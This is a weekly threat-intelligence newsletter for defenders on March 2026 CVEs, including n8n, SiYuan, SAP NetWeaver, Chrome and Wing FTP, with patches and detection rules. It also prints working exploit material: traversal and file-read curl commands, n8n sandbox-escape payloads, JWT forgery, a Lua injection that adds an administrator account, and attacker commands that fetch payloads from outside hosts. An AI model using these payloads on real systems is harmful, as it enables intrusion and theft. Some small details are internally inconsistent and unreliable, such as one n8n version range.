Threat Intel Weekly #11 — Week ending 17 Mar 2026

📅 Coverage period: 2026-03-10 → 2026-03-17 | 15 CVEs reviewed | 4 CISA KEV additions

This was a dense week for defenders. The headline items are two Chrome zero-days with an incomplete first patch (.75 is still partially vulnerable — the full fix is .80), a CVSS 9.9 n8n prototype-chain escape that Zerobot v9 and MuddyWater are actively weaponising across 24,700+ exposed instances, a WordPress LMS OAuth bypass that hit approximately 300 times in its first 24 hours, and unauthenticated Modbus-TCP RCE on industrial energy meters. A bonus CVE this week: CVE-2026-21858 (NI8MARE, CVSS 10.0) — a pre-auth n8n file-read-to-admin-JWT chain that predates CVE-2025-68613 and patches at the same version — many responders patching the KEV item have not noticed they also needed this one.

📊 Exposure & Exploitation Snapshot

🔴 Critical Vulnerabilities (CVSS ≥ 9.0)

🔴 CVE-2026-0953 — Tutor LMS Pro: Authentication Bypass via OAuth Email Mismatch (CVSS 9.8)

Vendor: WPDeveloper Affected: Tutor LMS Pro ≤ 3.9.5 (Social Login addon) Fixed: v3.9.6 — released January 30, 2026 CWE: CWE-287 — Improper Authentication CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H EPSS: 4.0% | Active exploitation confirmed: ~300 attacks blocked in the first 24 hours

The vulnerable function is TutorPro\SocialLogin\Authentication::authenticate(). It calls provider-specific token verification (e.g., verify_google_token()) and correctly validates that the OAuth token is cryptographically authentic — but then looks up the WordPress account using the email address supplied in the HTTP POST body, not the email address returned by the OAuth provider. These two values are never compared.

Exploit flow:

1. Attacker authenticates with their own Google/Facebook/GitHub account → receives a legitimate OAuth token
2. Sends POST admin-ajax.php?action=tutor_social_login with token intact but email=admin@targetsite.com
3. Server validates the token (it's real), looks up account by attacker-supplied email, creates a WordPress admin session

Admin email discovery: The WordPress REST API (/wp-json/wp/v2/users) exposes user slugs by default. Author archive pages (/?author=1) also leak email-derived slugs. Both are automated by attackers before launching the bypass.

Impact: Full account takeover of any WordPress user including administrators. Zero credentials, zero prior access, zero user interaction required.

Remediation:

wp plugin update tutor-pro
wp plugin get tutor-pro --field=version  # must return 3.9.6+

• Emergency workaround: WP Admin → Tutor LMS Pro → Add-ons → Social Login → Deactivate

Detection:

• POST requests to admin-ajax.php?action=tutor_social_login from IPs that have never logged into that account
• Multiple login attempts from the same IP with different email values
• Audit wp_usermeta for new session_tokens entries on admin accounts with suspicious timestamps
• Restrict /wp-json/wp/v2/users to authenticated requests to eliminate email enumeration

Severity: Critical | References: NVD · CVE Detail

🔴 CVE-2026-27685 — SAP NetWeaver Enterprise Portal: Insecure Deserialization RCE (CVSS 9.1)

Vendor: SAP SE Affected: SAP NetWeaver Enterprise Portal — component EP-RUNTIME 7.50 · package BC-PIN-PCD Fix: SAP Security Note 3714585 (HotNews) · FAQ Note 3724167 CWE: CWE-502 — Deserialization of Untrusted Data CVSS Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H Workaround: None — patch is mandatory

One of two HotNews notes in the March 2026 SAP Security Patch Day (20 total notes; 9 addressing NetWeaver). A high-privileged user uploads a serialized Java object as portal "content" to the Portal Content Directory (PCD) generic layer services (com.sap.portal.pcd.gl). The server calls ObjectInputStream.readObject() without class-level allow-listing, executing the embedded gadget chain — typically Jdk7u21 or CommonsCollections chains if the SAP classpath includes those libraries.

Gadget chain flow:

AnnotationInvocationHandler.readObject()
  → Proxy.entrySet()
    → LazyMap.get()
      → ChainedTransformer.transform()
        → InvokerTransformer("exec", new String[]{"/bin/sh", "-c", "curl attacker/shell.sh|sh"})

March 2026 SAP NetWeaver patch priorities:

Post-exploitation lateral movement paths:

• TicketKeystore theft: RCE on the Java stack exposes TicketKeystore.p12 — this private key signs SAP Logon Tickets, allowing the attacker to log into any connected ABAP system as any user, without a password
• Secure Storage: Cleartext RFC user credentials stored in /usr/sap/<SID>/SYS/global/security/data/SecStore.properties — readable once RCE is established
• RFC Hopping: Using stolen RFC credentials and RFCpwn, attackers abuse the Java stack's trust to call Remote-Enabled Function Modules on backend ABAP systems (create users, extract HR data, modify financial records)

Verify your fix level:

SM51 → System Status → EP-RUNTIME component SP level (per Note 3714585)

Detection — Sigma rule:

title: SAP NetWeaver Java Deserialization Attack
logsource: { category: webserver }
detection:
    selection:
        url|contains: '/irj/portal/admin'
        http_method: POST
        body|contains: 'aced0005'  # Java serialization magic bytes
    condition: selection
level: critical

Hardening:

• Apply Note 3714585; also review companion Note 3698553 (Log4j RCE, CVSS 9.8)
• Enable JEP 290 serialization filtering on the SAP JVM to block known gadget classes
• Audit Super Admin / Content Admin role holders; restrict to named individuals with MFA
• Review S_RFC authorizations on ABAP backend to limit RFC hopping damage

Severity: Critical | References: NVD · CVE Detail · SAP Note 3714585

🔴 CVE-2026-30869 — SiYuan: Double-Encoded Path Traversal → Arbitrary File Read → API RCE (CVSS 9.3)

Vendor: b3log Affected: SiYuan personal knowledge management system < v3.5.10 Fixed: v3.5.10 CWE: CWE-22 — Path Traversal Framework: Go / Gin web framework

Two flawed functions combine to make this exploitable without any authentication, even with a workspace access code set.

Flaw 1 — kernel/serve.go (path traversal):

// Vulnerable (pre-3.5.10): double-decode %252e%252e → %2e%2e → ..
filePath := strings.TrimPrefix(c.Request.URL.Path, "/export/")
decodedPath, _ := url.PathUnescape(filePath)
fullPath := filepath.Join(exportBaseDir, decodedPath)
c.File(fullPath) // serves ANY file on disk

// Fixed (3.5.10+)
absExportBase, _ := filepath.Abs(exportBaseDir)
fullPath := filepath.Join(absExportBase, filepath.Clean(decodedPath))
if !strings.HasPrefix(fullPath, absExportBase) {
    c.Status(http.StatusForbidden); return
}
c.File(fullPath)

Flaw 2 — kernel/session.go (automatic admin bypass):

// Any localhost request to /export/ gets RoleAdministrator — ignores accessAuthCode
if localhost {
    if strings.HasPrefix(c.Request.RequestURI, "/assets/") ||
       strings.HasPrefix(c.Request.RequestURI, "/export/") {
        c.Set(RoleContextKey, RoleAdministrator)
        c.Next()
        return
    }
}

SiYuan also sets Access-Control-Allow-Origin: * by default — any website in the browser silently fetches http://localhost:6806/export/... cross-origin.

PoC — full chain:

# Step 1: Steal api.token, cookieKey, accessAuthCode
curl "http://127.0.0.1:6806/export/%252e%252e/%252e%252e/conf/conf.json"

# Step 2: Escalate via admin API
curl -H "Authorization: Token <stolen_api.token>" \
     "http://127.0.0.1:6806/api/system/getNetwork"

# Step 3: Read arbitrary OS files
curl "http://127.0.0.1:6806/export/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd"

Remediation:

• Upgrade to SiYuan v3.5.10+
• Rotate api.token and accessAuthCode in conf/conf.json if previously exposed

Severity: Critical | References: NVD · CVE Detail

🔴 CVE-2025-41709 — Janitza/Weidmüller Energy Meters: Unauthenticated Modbus RCE (CVSS 9.8)

Vendors: Janitza Electronics, Weidmüller Advisory: CERT@VDE VDE-2025-079 / VDE-2025-096 — published March 10, 2026 CWE: CWE-78 — OS Command Injection CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H MITRE ATT&CK ICS: T0822 (External Remote Services), T0821 (Modify Controller Tasking)

The Modbus protocol handler passes unsanitised shell metacharacters (;, |, &) from configuration registers directly to a system call. Reachable over Modbus-TCP (port 502) and Modbus-RTU (RS-485 serial) — air-gapped OT networks with physical serial access are also in scope.

Full companion cluster (VDE-2025-079/096):

• CVE-2025-41710 — Hardcoded FTP credentials
• CVE-2025-41711 — Password hash extraction from firmware
• CVE-2025-41712 — Web server permission leak

Check if your device is vulnerable:

from pymodbus.client import ModbusTcpClient

client = ModbusTcpClient("192.168.1.100")
client.connect()
response = client.read_input_registers(750, 1)  # register 750 = firmware version
if not response.isError():
    ver = response.registers[0]
    print(f"Firmware: {ver / 100:.2f}")
    if ver <= 313:
        print("⚠  CRITICAL: Vulnerable to CVE-2025-41709")
client.close()

Impact: Full device OS compromise. OT consequences: falsified energy readings, SCADA/DCS network pivot, permanent device destruction.

Remediation:

• Update to Firmware 3.14 — Janitza · Weidmüller
• Immediate isolation:
  TERMINAL_CODE

  iptables -A INPUT -p tcp -s 192.168.1.10 --dport 502 -j ACCEPT
  iptables -A INPUT -p tcp --dport 502 -j DROP
  iptables -A INPUT -p tcp --dport 21 -j DROP   # FTP (CVE-2025-41710)
  iptables -A INPUT -p tcp --dport 80 -j DROP   # web mgmt
  

• Isolate on dedicated OT VLAN; disable Bluetooth; physically secure RS-485 cabling

Detection:

• Alert on port 502 connections from IPs outside the authorised SCADA master list
• Monitor for register writes outside normal SCADA polling windows
• Alert on new outbound TCP connections from meter IP addresses

Severity: Critical | References: NVD · CVE Detail · CERT@VDE VDE-2025-096

🟠 High Severity Vulnerabilities (CVSS 7.0–8.9)

🟠 CVE-2026-26105 — Microsoft SharePoint Server: Unauthenticated XSS / Spoofing (CVSS 8.1)

Vendor: Microsoft Affected: SharePoint Server Subscription Edition, 2019, 2016 (on-premises only) CWE: CWE-79 — Cross-Site Scripting CVSS Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

An unauthenticated attacker injects a crafted payload into a SharePoint page. When an authenticated user views it, the script executes under the trusted intranet domain — exfiltrating FedAuth session cookies, injecting fake login forms, or redirecting to malware staging infrastructure.

Required patches — March 10, 2026 Patch Tuesday:

Critical pre-patching checks:

• Subscription Edition on January 2026 CU? Install KB5002833 (February) + run PSConfig first, then apply March. Skipping causes PSConfig to crash.
• September 2025 CU installed? Remove NT Authority\system from WSS_WPG and IIS_IUSRS before patching or the installer will fail.
• Language packs must be installed alongside language-independent patches (e.g., KB5002847 for SP2019).

Post-installation — mandatory on every server in the farm:

psconfig.exe -cmd setup -cmd upgrade -force -cmd applicationcontent -install `
  -cmd installfeatures -cmd helpcollections -install -cmd allowsvcs -quiet

Severity: High | References: NVD · CVE Detail

🟠 CVE-2026-26982 — Ghostty Terminal: Invisible Control Character Injection via Paste (CVSS 8.8 / 6.3 CNA)

Vendor: Mitchell Hashimoto / ghostty-org Affected: Ghostty < v1.3.0 Fixed: v1.3.0 — PR #10746 CWE: CWE-78 | Advisory: GHSA-4jxv-xgrp-5m3r

Pre-1.3.0 Ghostty forwarded raw clipboard contents to the PTY. An attacker embeds 0x03 (Ctrl+C), 0x04 (Ctrl+D), or 0x0D (Enter) as invisible bytes in web content. When the victim pastes:

• 0x03 sends SIGINT to the foreground process — killing vim, python, ssh, etc.
• The shell command after the invisible byte executes immediately

The v1.3.0 sanitizePaste() fix (Zig) replaces all unsafe control characters with 0x20 before they reach the PTY. Bracketed paste mode does not protect against this — 0x03 terminates the bracket sequence at PTY level before the shell reads it.

brew upgrade ghostty && ghostty --version  # must show 1.3.0+

Severity: High | References: NVD · GHSA-4jxv-xgrp-5m3r

🟠 CVE-2026-28431 & CVE-2026-28432 — Misskey/Sharkey: Unauthenticated Data Leak + ActivityPub Bypass

Vendor: misskey-dev Affected: Misskey 8.45.0 – 2026.3.0 · Sharkey ≤ 2025.4.5 Fixed: Misskey 2026.3.1 · Sharkey 2025.4.6 — March 9, 2026

CVE-2026-28431 (CVSSv4 9.2) — GHSAs: GHSA-r33c-qg3g-v9cr · GHSA-cvf3-p7p2-27fh · GHSA-gg7j-c76w-8x3g Multiple internal API endpoints lack permission checks — unauthenticated access to private notes, follower lists, and restricted user data regardless of instance privacy settings.

CVE-2026-28432 (CVSSv4 7.1) — GHSA: GHSA-grwc-c762-gcvp ApRequestService.signedGet has an incomplete await chain in HTTP signature verification for ActivityPub inbox POST requests. Forged/unsigned activities are accepted as authentic. Disabling federation does not protect against this — the toggle is evaluated after the signature check.

CVE-2026-28433 (CVSSv4 2.3) — GHSA: GHSA-g6hj-33h7-6fq8 Missing ownership check (CWE-639) in data import — any user who knows a fileId can import another user's files.

# Docker
docker pull misskey/misskey:2026.3.1 && docker compose up -d

# Git-based
git fetch && git checkout 2026.3.1
pnpm install --frozen-lockfile && pnpm run build && pnpm run migrate

Post-upgrade — config/default.yml:

trustProxy: false  # or your specific proxy CIDR — incorrect value undermines rate limiting

Severity: Critical–High | References: NVD CVE-2026-28431 · NVD CVE-2026-28432

🟠 CVE-2026-30883 & CVE-2026-30929 — ImageMagick 7.1.2-16: Heap + Stack Overflows

Vendor: ImageMagick Studio | Released: March 8, 2026 Affected: ImageMagick < 7.1.2-16 and < 6.9.13-41

CVE-2026-30883 (CVSS 7.8) — coders/png.c: oversized image profile → OOB heap write in WritePNGImage. Fix: GetMaxProfileSize() validates profile length before allocation.

CVE-2026-30929 (CVSS 7.7) — MagickCore/resize.c: fixed-size stack buffer in MagnifyImage. Fix validates magnification² ≤ MaxMagnification.

Also fixed in 7.1.2-16: CVE-2026-28494 (morphology kernel stack corruption).

Fix commits: CVE-2026-30883: 5897fb65 (IM7) · 38756193 (IM6) | CVE-2026-30929: adf831c4 (IM7)

Distro lag mitigation — use the new max-profile-size policy key (7.1.2-16+):

<!-- /etc/ImageMagick-7/policy.xml -->
<policymap>
  <policy domain="resource" name="max-profile-size" value="10MB"/>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="width"  value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="area"   value="128MP"/>
</policymap>

Severity: High | References: NVD CVE-2026-30883 · NVD CVE-2026-30929

🚨 CISA Known Exploited Vulnerabilities — Added This Week

🚨 CVE-2026-3909 + CVE-2026-3910 — Chrome Zero-Days: Skia OOB + V8 Escape (CISA Due: 2026-03-27)

Vendor: Google Initial patch (incomplete for 3909): March 12, 2026 — 146.0.7680.75 Full fix: March 16, 2026 — 146.0.7680.80 (Win/Linux) / .81 (macOS) EPSS: CVE-2026-3909 27.12% · CVE-2026-3910 21.89% — both top 1% globally Added to CISA KEV: March 13, 2026 · Federal due date: March 27, 2026 Also affects: Edge 146.0.3020.x · Brave · Opera · Vivaldi · Electron 41.0.2 / 40.8.2 / 39.8.2 (Slack, Discord, VS Code remain vulnerable until each app ships an update) Attribution: Not officially confirmed; exploitation pattern consistent with Initial Access Brokers (IABs) or commercial spyware vendors

⚠️ 146.0.7680.75 is not fully patched for CVE-2026-3909. If your fleet stopped at .75, push the update to .80 immediately.

MITRE ATT&CK mapping:

CVE-2026-3909 — Skia Out-of-Bounds Write GrAtlasManager / TextAtlasManager select the wrong GPU atlas for a glyph mask format (A8 vs. ARGB). Pixel writes exceed the allocated buffer boundary — memory corruption in the renderer, usable as a sandbox escape primitive when chained with the V8 flaw.

CVE-2026-3910 — V8 Inappropriate Implementation Logic flaw in V8's JIT compiler (TurboFan/Maglev). JavaScript on a crafted page escapes the V8 sandbox and achieves arbitrary code execution in the renderer process. Chained with CVE-2026-3909 → full OS-level RCE from a single page load.

Verify and force-update:

google-chrome --version   # must show 146.0.7680.80+
sudo apt update && sudo apt install --only-upgrade google-chrome-stable

Patch-on-disk ≠ patched. Chrome downloads silently but does not activate until fully restarted. Push via GPO: UpdateDefault + RelaunchNotification = 0.

Electron apps (Slack, Discord, VS Code): Update via normal application updates — they bundle their own Chromium. Check each app's release notes for the Chromium version upgrade.

KQL detection — Microsoft Sentinel / Defender:

DeviceProcessEvents
| where InitiatingProcessFileName in~ ("chrome.exe","msedge.exe","brave.exe")
| where FileName in~ ("cmd.exe","powershell.exe","sh","bash","schtasks.exe","curl.exe","wget.exe")
| where Timestamp > ago(7d)

Post-exploitation signals:

• Renderer processes spawning cmd.exe, powershell.exe, /bin/sh, or curl
• Status_Access_Violation or Status_Stack_Buffer_Overrun in browser crash logs followed by suspicious egress

Severity: Critical | References: NVD CVE-2026-3909 · NVD CVE-2026-3910 · Chrome Releases Blog

🚨 CVE-2025-68613 + CVE-2026-21858 — n8n: Two Critical RCEs Across 24,700 Exposed Instances

Vendor: n8n GmbH Active threat actors: Zerobot v9 botnet · MuddyWater (Iranian APT, Static Kitten) Exposed instances (Censys/Shodan): ~24,700 — North America 49.8%, Europe 31.6%

These two CVEs affect largely the same version range and both fixed by upgrading to 1.122.0+. Many responders patching for the CISA KEV item (68613) have not realised they also had 21858 open.

CVE-2025-68613 — Prototype Chain Escape → OS RCE (CVSS 9.9 | CISA Due: 2026-03-25)

Affected: n8n 0.211.0 – 1.120.3 Fixed: 1.120.4, 1.121.1, 1.122.0+ CWE: CWE-913 | Added to CISA KEV: March 11, 2026 Metasploit module: exploit/multi/http/n8n_workflow_expression_rce (PR #20810, merged January 13, 2026) Public PoCs: GitHub wioui, TheStingR — released December 22-26, 2025

Disclosure timeline:

• Dec 19, 2025 — CVE publicly disclosed
• Dec 22-26, 2025 — Multiple public PoCs on GitHub
• Jan 13, 2026 — Metasploit module merged (MSF v4.22.9)
• Jan–Feb 2026 — Zerobot v9 begins mass-scanning n8n instances
• Mar 11, 2026 — Added to CISA KEV

n8n evaluated expressions using the Node.js vm module, which provides scoping but not security isolation. Any user with Workflow Edit permissions (not admin) can reach the host process object via prototype chain traversal in any expression field.

Exploit payload:

// Execute OS command
{{ this.constructor.constructor("return process")()
     .mainModule.require("child_process")
     .execSync("id").toString() }}

// Dump all env vars (N8N_ENCRYPTION_KEY, DB passwords, OAuth tokens)
{{ this.constructor.constructor("return process")().env }}

Zerobot v9 observed payload (n8n exploitation):

# Observed in /rest/workflow/run requests
cd /tmp || cd /var/run
wget http://144.172.100[.]228/tol.sh
chmod 777 tol.sh && sh tol.sh

CVE-2026-21858 (NI8MARE) — Pre-Auth File Read → Admin JWT Forgery → RCE (CVSS 10.0)

Affected: n8n 1.65.0 – 1.120.3 Fixed: 1.121.0+ (also 1.122.0+) CWE: CWE-434 — Unrestricted File Upload / Path Traversal Auth required: None — targets publicly accessible Form Webhook endpoints

The request parsing middleware checks Content-Type to decide whether to parse as multipart/form-data (safe) or raw JSON (vulnerable). If the JSON body contains a files key, it persists into formWebhook() which calls copyBinaryFile(file.filepath) — passing the attacker-controlled path directly to the file system.

Step 1 — Steal the database:

curl -X POST https://n8n-instance.com/webhook/<form-id> \
  -H "Content-Type: application/json" \
  -d '{"files":{"x":{"filepath":"/home/node/.n8n/database.sqlite","name":"db"}}}'

Step 2 — Forge admin JWT:

const jwt = require('jsonwebtoken');
const token = jwt.sign(
  { userId: "ADMIN_ID_FROM_LEAKED_DB", email: "admin@company.com" },
  "LEAKED_ENCRYPTION_SECRET",
  { algorithm: 'HS256' }
);
// Use as: Cookie: n8n-auth=<token>

Step 3 — Create an Execute Command node → RCE as the n8n process user

Note: This attack requires at least one active, public Form Webhook. If your instance only uses authenticated webhooks the pre-auth surface is removed, but patching is still mandatory.

Combined attacker TTPs (Zerobot v9 / MuddyWater):

1. Scan for n8n on /rest/settings (unauthenticated endpoint revealing version)
2. If < 1.121.0 → use CVE-2026-21858 (pre-auth) to steal database.sqlite + forge admin cookie
3. If 1.121.0 – 1.120.3 or authenticated session available → use CVE-2025-68613 expression injection
4. Execute tol.sh to deploy zerobotv9.x86_64 (UPX-packed, XOR key 0xDEADBEEF)
5. Dump N8N_ENCRYPTION_KEY → decrypt all stored credentials → pivot to AWS/Slack/GH/Postgres
6. Persist via Cron Trigger + Execute Command node

Confirmed IoCs — Zerobot v9 / MuddyWater:

Detection — Sigma rule:

title: n8n CVE-2025-68613/CVE-2026-21858 Exploitation
status: experimental
logsource: { category: webserver }
detection:
    sandbox_escape:
        url|contains: '/rest/workflows'
        method: POST
        body|contains:
            - 'constructor.constructor'
            - 'process.mainModule'
            - 'child_process'
    preauth_read:
        url|contains: '/webhook/'
        method: POST
        body|contains:
            - '"files"'
            - '"filepath"'
            - 'database.sqlite'
    condition: sandbox_escape or preauth_read
level: critical

Database hunt (PostgreSQL):

SELECT id, name, updated_at FROM workflow
WHERE nodes::text LIKE '%constructor.constructor%'
   OR nodes::text LIKE '%process.mainModule%'
   OR nodes::text LIKE '%child_process%'
   OR nodes::text LIKE '%execSync%';

Censys — find exposed instances:

host.services: (software.product: "n8n" and software.version < "1.121.0")

Remediation:

docker pull n8nio/n8n:latest && docker compose up -d
npm install -g n8n@latest

Hardened Docker Compose:

services:
  n8n:
    image: n8nio/n8n:1.122.0
    user: "1000:1000"
    read_only: true
    tmpfs: [/home/node/.n8n]
    security_opt: [no-new-privileges:true]
    cap_drop: [ALL]
    environment:
      - N8N_BLOCK_ENV_ACCESS_IN_NODE=true
      - N8N_PERSONALIZATION_ENABLED=false  # disables public sign-ups

Post-patch mandatory actions:

• Rotate every API key, DB password, and OAuth token stored in n8n
• Treat N8N_ENCRYPTION_KEY as compromised — re-encrypt the credential store
• Audit Edit Workflow role assignments; restrict to users who genuinely need it
• Check for tol.sh in /tmp and /var/run; scan for Zerobot binary SHA-256 above

Severity: Critical | References: NVD CVE-2025-68613 · NVD CVE-2026-21858 · CVE Detail

🚨 CVE-2025-47813 — Wing FTP Server: Path Disclosure Enabling Full RCE Chain (CVSS 4.3 → 10.0 effective | CISA Due: 2026-03-30)

Vendor: Wing FTP Software Affected: Wing FTP Server < v7.4.4 Fixed: v7.4.4 — May 14, 2025 Added to CISA KEV: March 16, 2026 CWE: CWE-209 — Sensitive Error Message Threat actors: Akira, Interlock ransomware groups; initial access brokered via this chain

Note: The companion RCE CVE-2025-47812 was added to CISA KEV separately on July 14, 2025 (FCEB deadline August 4, 2025). If you have not patched since then, you are exposed to the full chain with no additional steps required by attackers.

Step 1 — Path disclosure (CVE-2025-47813): /loginok.html calls the Lua template engine with the UID cookie as input. A cookie > ~200 chars causes a verbose error leaking the full install path:

GET /loginok.html HTTP/1.1
Host: target:8080
Cookie: UID=AAAA[200+ chars]AAAA

Response: C:\Program Files\Wing FTP Server\lua\loginok.html

Step 2 — Null-byte Lua session injection (CVE-2025-47812): The attacker's Lua payload closes the existing [[...]] string bracket, injects malicious code, then comments out the rest:

]]
local h = io.popen("net user wingftp P@ss123 /add && net localgroup administrators wingftp /add")
h:read("*a"); h:close()
--]]%00

This string is written to <install_path>\temp\sess_<token>.lua. The Wing FTP Lua interpreter executes it on the next session request — with SYSTEM privileges (CVE-2025-47811: service defaults to SYSTEM).

Observed Akira/Interlock TTPs post-exploitation:

1. whoami → ipconfig → arp -a → net user (recon)
2. net user wingftp <password> /add (persistence user)
3. certutil -urlcache -f http://<c2>/payload.exe %TEMP%\payload.exe (stage 2 download)
4. Deploy ScreenConnect or AnyDesk for persistent remote access
5. Move to data exfiltration and ransomware pre-positioning

Remediation:

• Update to Wing FTP Server v7.4.4+ immediately
• Restrict web admin (ports 8080/8443) to internal IPs only — never internet-facing
• Disable anonymous FTP login if not required
• WAF rule: block requests where UID cookie exceeds 256 characters

Detection (IoCs):

• GET /loginok.html with UID cookie length > 200 chars
• .lua files in session/ or temp/ directories larger than 1 KB — benign session files are tiny
• Log/Domains/ entries with truncated "User '..." strings (null byte truncation artifact)
• WingFTPServer.exe spawning cmd.exe, powershell.exe, certutil.exe, or RMM tools

# Hunt injected session files (Windows)
Get-ChildItem "C:\Program Files\Wing FTP Server\temp\" -Filter "sess_*.lua" |
  Where-Object { $_.Length -gt 1024 } |
  Select-Object FullName, Length, LastWriteTime

Severity (chain): 10.0 effective | References: NVD · CVE Detail

📌 This Week's TL;DR

Next edition publishes Friday, 24 March. Have a threat feed, IOC, or CVE you want featured? Reach out via the contact page.